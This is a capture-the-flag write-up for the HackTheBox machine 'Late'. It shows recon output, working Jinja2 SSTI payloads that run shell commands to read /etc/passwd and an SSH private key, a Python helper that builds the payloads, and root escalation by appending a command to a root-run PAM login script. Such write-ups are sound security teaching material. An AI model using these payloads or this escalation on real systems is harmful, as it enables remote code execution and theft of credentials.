1. IP Address
# Machine Address
10.10.11.156
# Local Address
10.10.14.44
2. Nmap & Nikto
nmap
nmap -sC -sV -oA nmap/late 10.10.11.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 22:28 EDT
Nmap scan report for 10.10.11.156
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.86 seconds
Nikto
nikto -h 10.10.11.156
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.156
+ Target Hostname: 10.10.11.156
+ Target Port: 80
+ Start Time: 2022-07-14 22:29:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
3. Feroxbuster & ffuf
feroxbuster -u http://late.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://late.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 7l 13w 194c http://late.htb/assets
301 7l 13w 194c http://late.htb/assets/css
301 7l 13w 194c http://late.htb/assets/images
301 7l 13w 194c http://late.htb/assets/js
301 7l 13w 194c http://late.htb/assets/fonts
[####################] - 2m 179994/179994 0s found:5 errors:0
[####################] - 2m 29999/29999 204/s http://late.htb
[####################] - 2m 29999/29999 205/s http://late.htb/assets
[####################] - 2m 29999/29999 205/s http://late.htb/assets/css
[####################] - 2m 29999/29999 205/s http://late.htb/assets/images
[####################] - 2m 29999/29999 205/s http://late.htb/assets/js
[####################] - 2m 29999/29999 205/s http://late.htb/assets/fonts
ffuf
ffuf -c -u http://late.htb/ -H "Host: FUZZ.late.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 9461
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://late.htb/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.late.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 9461
________________________________________________
images [Status: 200, Size: 2187, Words: 448, Lines: 64]
:: Progress: [4989/4989] :: Job [1/1] :: 169 req/sec :: Duration: [0:00:30] :: Errors: 0 ::
4. Burp
POST /scanner HTTP/1.1
Host: images.late.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------260872003713748502303208156715
Content-Length: 33052
Origin: http://images.late.htb
DNT: 1
Connection: close
Referer: http://images.late.htb/
Upgrade-Insecure-Requests: 1
-----------------------------260872003713748502303208156715
Content-Disposition: form-data; name="file"; filename="Screenshot_2022-07-15 Image Reader.png"
Content-Type: image/png
PNG
-----------------------------260872003713748502303208156715--
The image reader on images.late.htb OCRs the uploaded picture and renders the extracted text through a Jinja2-style template, so text inside {{ }} is evaluated server-side (SSTI). Use https://cloudconvert.com/txt-to-jpg to turn a txt file holding the payload into an image; a payload that dumps passwd looks like this:
{{(''.__class__).__mro__[1].__subclasses__()[249]("cat /etc/passwd", stdout=-1, shell=True).communicate() }}
Convert the txt to jpg, upload it, and the returned result.txt contains the Popen.communicate() tuple:
<p>(b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nsshd:x:110:65534::/run/sshd:/usr/sbin/nologin\nsvc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash\nrtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\nusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\navahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nsaned:x:115:119::/var/lib/saned:/usr/sbin/nologin\ncolord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\npulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\ngeoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin\nsmmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin\nsmmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin\n', None)
</p>
The only non-system account with a real login shell is svc_acc:
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
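The following Python script is an added example and is not part of the original writeup or the target application. It shows the two halves of the step above in working code: building the Jinja2 SSTI payload (the `__subclasses__()[249]` index on the page is specific to the target's interpreter and import order, so the helpers either look the index up or avoid it with a name-based loop), running the same `Popen` primitive locally to confirm what it returns, and parsing the rendered `(b'...', None)` tuple back into passwd lines to pick out login-capable accounts. The `SAMPLE_RESULT` string is a constructed, shortened copy of the target's output; the function names are mine.

```python
"""Added example (not from the original writeup): build the Jinja2 SSTI
payload used above and post-process what the target returns.

Assumption (labelled here and in the lead-in): the target renders OCR'd text
through a Jinja2-style template, so ''.__class__.__mro__[1] is `object` and
object.__subclasses__() exposes subprocess.Popen. The index 249 seen on the
page is interpreter-specific, which is why it is looked up or avoided below.
"""
import ast
import subprocess  # imported so subprocess.Popen is registered as a subclass of object


def find_popen_index():
    """Index of subprocess.Popen in object.__subclasses__() on *this* interpreter.

    On the target the index was 249; locally it will almost certainly differ,
    which is exactly why hard-coding an index is fragile.
    """
    for i, cls in enumerate(object.__subclasses__()):
        if cls.__module__ == "subprocess" and cls.__name__ == "Popen":
            return i
    raise LookupError("subprocess.Popen not found among object subclasses")


def build_payload(cmd, index):
    """Same shape as the page's payload, with a chosen index and command."""
    return (
        "{{(''.__class__).__mro__[1].__subclasses__()[%d]"
        "(%r, stdout=-1, shell=True).communicate() }}" % (index, cmd)
    )


def build_portable_payload(cmd):
    """Index-free variant: walk the subclass list inside the template and
    select Popen by name, so it works regardless of the target's index."""
    return (
        "{% for c in ''.__class__.__mro__[1].__subclasses__() %}"
        "{% if c.__name__ == 'Popen' %}"
        "{{ c(" + repr(cmd) + ", stdout=-1, shell=True).communicate() }}"
        "{% endif %}{% endfor %}"
    )


def local_check(cmd):
    """Run the same primitive locally (no template engine needed) to confirm
    the located subclass is Popen and that communicate() yields (stdout, None)
    when only stdout is captured."""
    popen = object.__subclasses__()[find_popen_index()]
    return popen(cmd, stdout=-1, shell=True).communicate()


def parse_result(rendered):
    """Turn the rendered "<p>(b'...', None)</p>" text back into passwd lines."""
    text = rendered.strip()
    if text.startswith("<p>") and text.endswith("</p>"):
        text = text[3:-4].strip()
    stdout, _stderr = ast.literal_eval(text)  # safe: literals only, no eval()
    return stdout.decode().splitlines()


def login_capable(passwd_lines):
    """Accounts whose shell can actually log in; what we scan passwd for."""
    no_login = {"/usr/sbin/nologin", "/bin/false", "/bin/sync"}
    users = []
    for line in passwd_lines:
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in no_login:
            users.append((fields[0], int(fields[2]), fields[5], fields[6]))
    return users


# Constructed sample: a shortened copy of the tuple the target rendered.
SAMPLE_RESULT = (
    "<p>(b'root:x:0:0:root:/root:/bin/bash\\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\n"
    "lxd:x:105:65534::/var/lib/lxd/:/bin/false\\n"
    "svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash\\n', None)\n</p>"
)

if __name__ == "__main__":
    print(build_payload("cat /etc/passwd", 249))
    print(build_portable_payload("cat ~/.ssh/id_rsa"))
    print(local_check("id")[0].decode().strip())
    for name, uid, home, shell in login_capable(parse_result(SAMPLE_RESULT)):
        print(name, uid, home, shell)
```

The portable payload is the one to reach for when the subclass index is unknown: it costs nothing extra on the target and removes the guesswork of counting `__subclasses__()` entries by hand.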
svc_acc: getting SSH access. The same primitive reads the account's private key:
{{(''.__class__).__mro__[1].__subclasses__()[249]("cat ~/.ssh/id_rsa", stdout=-1, shell=True).communicate() }}
id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEp*****************
-----END RSA PRIVATE KEY-----
user.txt
550e06****************
5. Privilege escalation
Running pspy shows /usr/local/sbin/ssh-alert.sh being executed on every SSH login. The PAM_USER, PAM_RHOST and PAM_TYPE variables it reads mark it as a PAM session hook, which runs with root privileges:
svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
lsattr
The script carries the append-only attribute (a): it cannot be truncated or overwritten, but new lines can still be appended to it with echo or >>, which is all that is needed here.
svc_acc@late:/usr/local/sbin$ lsattr ssh-alert.sh
-----a--------e--- ssh-alert.sh
Create a txt file in /tmp containing the command to append:
cat /root/root.txt >> /home/svc_acc/flag.txt
Append it to ssh-alert.sh:
cat /tmp/haha.txt >> /usr/local/sbin/ssh-alert.sh
To trigger ssh-alert.sh, log out of the svc_acc session and SSH back in with id_rsa. The PAM open_session hook runs the script as root, the appended line copies root.txt into flag.txt, and the flag can then be read as svc_acc.
root.txt
63195a4*********